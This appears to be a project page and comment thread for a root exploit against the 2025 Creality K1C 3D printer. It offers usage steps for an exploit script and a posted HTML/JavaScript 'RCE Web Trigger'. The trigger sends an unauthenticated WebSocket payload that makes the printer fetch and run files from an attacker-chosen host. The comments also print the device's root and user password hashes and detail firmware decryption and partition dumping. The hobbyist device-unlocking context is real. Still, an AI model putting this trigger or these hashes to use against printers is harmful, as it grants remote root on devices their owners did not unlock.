K1C 2025 Root Exploit

Creality made the decision to remove the built-in root option from the 2025 model of the K1C, among other changes.

We're a long way off having a helper-script for this model, but at least this is the first step in the process. If anybody is interested in helping out with that, all help is appreciated!

Note: Running this script is done at your own risk. I am not responsible for any damaged or bricked devices.

All donations will help fund my new 3d printing habit...

Usage

On Windows, WSL is recommended.

1. Download the script.
2. Generate a new RSA key by running ssh-keygen -t ecdsa -f ~/.ssh/id_ecdsa.
3. If prompted for a passphrase, just press enter.
4. Install python3.
5. Install the dependencies: pip install websocket-client
6. Execute the script, replacing [PRINTER_IP] and [HOST_IP] with the IP address of your printer and current device (running the script) respectively: python3 k1c-2025-exploit.py --host-ip [HOST_IP] --printer-ip [PRINTER_IP] --public-key ~/.ssh/id_ecdsa.pub
7. You should see the printer downloading each of the files, and eventually a success message. If it hangs at [*] Sending trigger:... your firewall might be blocking requests to the web server started by the script.
8. SSH into the machine: ssh root@[PRINTER_IP].
9. Enjoy your root!
10. Join the discord to help continue the work: https://discord.gg/FffAZcUJtr

Note: Each reboot, the printer will generate a new host key. Attempting to SSH again may give a warning about the host key changing. This is fine, just remove the entry from ~/.ssh/known_hosts as it explains.

⚠️ Warning ⚠️

THERE IS CURRENTLY NO FIRMWARE RECOVERY FOR THIS DEVICE. BE CAREFUL WHAT FILES YOU MODIFY OR RISK BRICKING YOUR PRINTER.

Not bad 🤝👍🏻

Thank you!

Cool, its a pity that the helper script doesnt work. Do you know if its possible to insert improved shapers through this root or local fluidd?

Cool, its a pity that the helper script doesnt work. Do you know if its possible to insert improved shapers through this root or local fluidd?

I've not checked but I don't see why not. If you give it a try I'd be curious to know how you get on!

Does anyone know the account and password for the 2025 K1C?

You can find the password hash in the shadow file (/etc/shadow) but I haven't had a go at cracking it yet. If you need to run anything as the creality user you can always su as that user without knowing the password.

Круто, жаль, что вспомогательный скрипт не работает. А вы не знаете, можно ли вставить улучшенные шейперы через этот корень или локальный fluidd?

Я не проверял, но не вижу причин, почему бы и нет. Если вы попробуете, мне будет интересно узнать, как у вас получится!

I dont know yet how to install improved shapers from the helper script, the firmware is very limited, and the standard shapers from Creality are very bad.

Just want to point out that there is currently no firmware recovery for this model. Be careful what files you modify, as there is a risk that you can brick your device!

Creality упал в моих глазах ниже плинтуса. Где можно сдать принтер обратно и вернуть свои деньги?

Creality упал в моих глазах ниже плинтуса. Где можно сдать принтер обратно и вернуть свои деньги?

Почему? Наоборот же тебя защищают чтобы ты не наворотил делов. Покупай BL, кто не дает?

Thank You very much.
The device tries to call home at api.crealitycloud.com and mqtt.crealitycloud.com (sends way too much info), so I'll keep it without any access to public internet to prevent any further "improvements" from Creality.

So far (USE THIS INFO AT YOUR OWN RISK):

MMC data

• full MMC backup: ssh root@k1c 'dd if=/devmmcblk0 bs=1M' > mmc.dump
• it seems X2600 processor on the mainboard uses Ingenic "secure boot" (google for X2000_Hardware_Design_Guide_V1.1.pdf, section 2.1.4 "Boot and Security Boot). Was unable to find any more relevant documentation.
• MMC partition table (fdisk -l):
  -- first 1MB (GPT table and likely encrypted u-boot)
  -- p1 ("ota") ???
  -- p2 ("sn_mac") - info from it is decrypted to /tmp/params (see /bin/seed.sh)
  -- p3 ("rtos") ???
  -- p4 ("rtos2") may be used by klipper (found ...[creality_rom_manager:load_infos:69] load device [flash](/dev/mmcblk0p4) in /usr/data/printer_data/logs/klippy.log)
  -- p5 ("kernel") - encrypted current kernel
  -- p6 ("kernel2") - encrypted older kernel (I did firmware update via USB, so likely the previous one)
  -- p7 ("rootfs") - not encrypted squashfs at 2048 byte offset (see /bin/seed.sh), loop-mounted on /usr/deplibs , not sure if it's checksum is verified on boot or not
  -- p8 ("rootfs2") - ext4 , mounted on /usr/apps
  -- p9 ("rootfs_data") - empty (zero filled)
  -- p10 ("userdata") - ext4, mounted on /usr/data (g-code files, logs ...)

Kernel

Kernel bootargs: console=ttyS2,3000000n8 mem=242M@0x0 rmem=13M@0xf200000 rtos_size=1M@0xff00000 rdinit=/linuxrc root=/dev/ram0 rootwait rootfstype=ramfs rw clk_ignore_unused , so it seems kernel mounts embedded ramfs, runs /linuxrc(busybox), which starts /etc/init.d/rcS, which starts /bin/seed.sh

/bin/seed.sh uses cmd_sc to verify/decode encrypted data/binaries, so I used the same cmd_sc to decode kernels: dumped p5 and p6 partitions, created unprivileged user just in case, chmod a+rw /dev/sc and run cmd_sc on dumps like in seed.sh. Device /dev/sc is related to soc_security.ko module loaded from the same seed.sh.

To get ramfs images from decoded kernels:

• binwalk --extract kernel.img
• zcat < Linux-5.10.186.bin > Linux-5.10.186.bin.extracted
• binwalk --extract Linux-5.10.186.bin.extracted
• cpio -it < decompressed.bin

Network

• current status: ss -anp
• iptables rules: iptables-save
• to redirect mqtt messages to Your own server:echo '192.168.0.1 mqtt.crealitycloud.com' >> /etc/hosts

Hope it helps to move forward.

I added a website version maybe working?

<!DOCTYPE html>
<html>
<head>
    <title>Printer RCE Web Trigger</title>
    <style>
        body { font-family: sans-serif; background: #121212; color: #e0e0e0; padding: 40px; }
        .container { max-width: 600px; margin: auto; background: #1e1e1e; padding: 25px; border-radius: 8px; border: 1px solid #333; }
        input, textarea { width: 100%; padding: 10px; margin: 10px 0; background: #2a2a2a; border: 1px solid #444; color: #fff; border-radius: 4px; }
        button { background: #007bff; color: white; border: none; padding: 12px 20px; cursor: pointer; border-radius: 4px; width: 100%; font-weight: bold; }
        button:hover { background: #0056b3; }
        #status { margin-top: 20px; padding: 10px; border-left: 3px solid #007bff; background: #111; font-family: monospace; white-space: pre-wrap; }
    </style>
</head>
<body>
    <div class="container">
        <h2>K1C Exploit Trigger</h2>
        
        <label>Printer IP:</label>
        <input type="text" id="printerIp" placeholder="192.168.1.100">

        <label>Public Key (Contents of id_ecdsa.pub):</label>
        <textarea id="pubKey" rows="3" placeholder="ecdsa-sha2-nistp256 ..."></textarea>

        <label>Host IP (Your PC running the payload host):</label>
        <input type="text" id="hostIp" placeholder="192.168.1.50">

        <button onclick="launchExploit()">Send Exploit Trigger</button>
        
        <div id="status">System Ready.</div>
    </div>

    <script>
        function log(msg) {
            document.getElementById('status').innerText += "\n" + msg;
        }

        async function launchExploit() {
            const printerIp = document.getElementById('printerIp').value;
            const hostIp = document.getElementById('hostIp').value;
            const wsUrl = `ws://${printerIp}:9999/`;
            
            log(`[!] Attempting connection to ${wsUrl}...`);

            try {
                // Browsers allow subprotocols like 'wsslicer'
                const socket = new WebSocket(wsUrl, ["wsslicer"]);

                socket.onopen = () => {
                    log("[+] WebSocket Connected!");
                    
                    const payload = {
                        "method": "set",
                        "params": {
                            "print": `http://${hostIp}:4444/exploit-${Date.now()}`,
                            "printId": "1337"
                        }
                    };

                    log("[*] Sending trigger payload...");
                    socket.send(JSON.stringify(payload));
                    log("[+] Trigger sent! Keep your payload host running.");
                    
                    setTimeout(() => socket.close(), 3000);
                };

                socket.onerror = (error) => {
                    log("[-] WebSocket Error. Check Printer IP and Network.");
                };

                socket.onclose = () => log("[*] Connection closed.");

            } catch (e) {
                log("[-] Error: " + e.message);
            }
        }
    </script>
</body>
</html>

You can find the password hash in the shadow file (/etc/shadow) but I haven't had a go at cracking it yet. If you need to run anything as the creality user you can always su as that user without knowing the password.

Do you have hash of it?

Do you have hash of it?

From RAMFS:/etc/shadow_security:
!root:$1$FgWavfhM$xLITYIZ59pfIFs6ESSnE2/:20129::::::
!creality:$5$i8KKHaaFTqP2XasW$uuOKlkGLEI3gvfPBDgBjTmjWCU1cq7g6q58Xjd9M4uD:::::::

These are copied to /etc/shadow -> /tmp/shadow on boot. And may be "unlocked" by removing ! from seed.sh if correct encrypted /usr/data/permission file is present (as far as I understand these passwords are unusable unless You get and upload permission file).

Do you have hash of it?

From RAMFS:/etc/shadow_security: !root:$1$FgWavfhM$xLITYIZ59pfIFs6ESSnE2/:20129:::::: !creality:$5$i8KKHaaFTqP2XasW$uuOKlkGLEI3gvfPBDgBjTmjWCU1cq7g6q58Xjd9M4uD:::::::

These are copied to /etc/shadow -> /tmp/shadow on boot. And may be "unlocked" by removing ! from seed.sh if correct encrypted /usr/data/permission file is present (as far as I understand these passwords are unusable unless You get and upload permission file).

This is actually something that was added in the .26 release, and looks to be an official process to gain root that's still under development. Based on the code I found it looks like you'll probably have to sign an agreement and they'll give you the permission file in return that you then put on a USB. This will be signed (and verified with cmd_sc) and tied to your device.

Do you have hash of it?

From RAMFS:/etc/shadow_security: !root:$1$FgWavfhM$xLITYIZ59pfIFs6ESSnE2/:20129:::::: !creality:$5$i8KKHaaFTqP2XasW$uuOKlkGLEI3gvfPBDgBjTmjWCU1cq7g6q58Xjd9M4uD:::::::
These are copied to /etc/shadow -> /tmp/shadow on boot. And may be "unlocked" by removing ! from seed.sh if correct encrypted /usr/data/permission file is present (as far as I understand these passwords are unusable unless You get and upload permission file).

This is actually something that was added in the .26 release, and looks to be an official process to gain root that's still under development. Based on the code I found it looks like you'll probably have to sign an agreement and they'll give you the permission file in return that you then put on a USB. This will be signed (and verified with cmd_sc) and tied to your device.

So new mainboard they encrypted emmc?

In general, root doesn't give anything since there are no many dependencies, not even a graphical interface, and the helper itself needs to be completely rewritten for this firmware. With the new cfs-c, the firmware is also stripped down, but as I understand it, it has two cores for the new and old hardware.

In general, root doesn't give anything since there are no many dependencies, not even a graphical interface, and the helper itself needs to be completely rewritten for this firmware. With the new cfs-c, the firmware is also stripped down, but as I understand it, it has two cores for the new and old hardware.

Root alone doesn't give anything I guess, but it does open up the gateway to do a lot more including rewriting the helper script.

In general, root doesn't give anything since there are no many dependencies, not even a graphical interface, and the helper itself needs to be completely rewritten for this firmware. With the new cfs-c, the firmware is also stripped down, but as I understand it, it has two cores for the new and old hardware.

Root alone doesn't give anything I guess, but it does open up the gateway to do a lot more including rewriting the helper script.

Have you figured out how to transfer klipper from the closed section yet?

In general, root doesn't give anything since there are no many dependencies, not even a graphical interface, and the helper itself needs to be completely rewritten for this firmware. With the new cfs-c, the firmware is also stripped down, but as I understand it, it has two cores for the new and old hardware.

Root alone doesn't give anything I guess, but it does open up the gateway to do a lot more including rewriting the helper script.

Have you figured out how to transfer klipper from the closed section yet?

Not quite sure what you're meaning here?

I've setup a discord server for anybody wanting to discuss further / work on helper script porting too: https://discord.gg/FffAZcUJtr

So new mainboard they encrypted emmc?

Partially encrypted. I don't know how exactly X2000 secure boot works, but if I correctly understand pdf referred above - the chip has a bunch of one-time-programmable fuses used to turn on secure boot and on-chip memory to hold the key (not sure if it is possible to change it after initial programming).

So it seems bootloader is encrypted (likely it is u-boot, but haven't verified). Kernel with embedded RAMfs is also encrypted (can be easily decrypted as shown above). /usr/deplibs is not encryppted (squashfs), but haven't verified if it's checsum is verified on boot. Tho ext4 filesystems /usr/apps ant /usr/data are not encrypted and can be modified (exploit modifies /usr/apps without causing issues).

/usr/apps contains 8 encrypted binaries, which are decrypted to tmpfs at /tmp/apps on boot (can be downloaded for further inspection once You have root).

Klipper seems to be not encrypted, but it is present in Python byte code only (.pyc files). At least some i'ts config files are plain text.

"sn_mac" partition is also encrypted and contains at least model and device info (likely unique).

So new mainboard they encrypted emmc?

Partially encrypted. I don't know how exactly X2000 secure boot works, but if I correctly understand pdf referred above - the chip has a bunch of one-time-programmable fuses used to turn on secure boot and on-chip memory to hold the key (not sure if it is possible to change it after initial programming).

So it seems bootloader is encrypted (likely it is u-boot, but haven't verified). Kernel with embedded RAMfs is also encrypted (can be easily decrypted as shown above). /usr/deplibs is not encryppted (squashfs), but haven't verified if it's checsum is verified on boot. Tho ext4 filesystems /usr/apps ant /usr/data are not encrypted and can be modified (exploit modifies /usr/apps without causing issues).

/usr/apps contains 8 encrypted binaries, which are decrypted to tmpfs at /tmp/apps on boot (can be downloaded for further inspection once You have root).

Klipper seems to be not encrypted, but it is present in Python byte code only (.pyc files). At least some i'ts config files are plain text.

"sn_mac" partition is also encrypted and contains at least model and device info (likely unique).

The cmd_sc command is what is used to decrypt these (e.g. cmd_sc src=/tmp/sn_mac.signed dst=/tmp/params > /dev/console 2>&1 from /bin/seed.sh)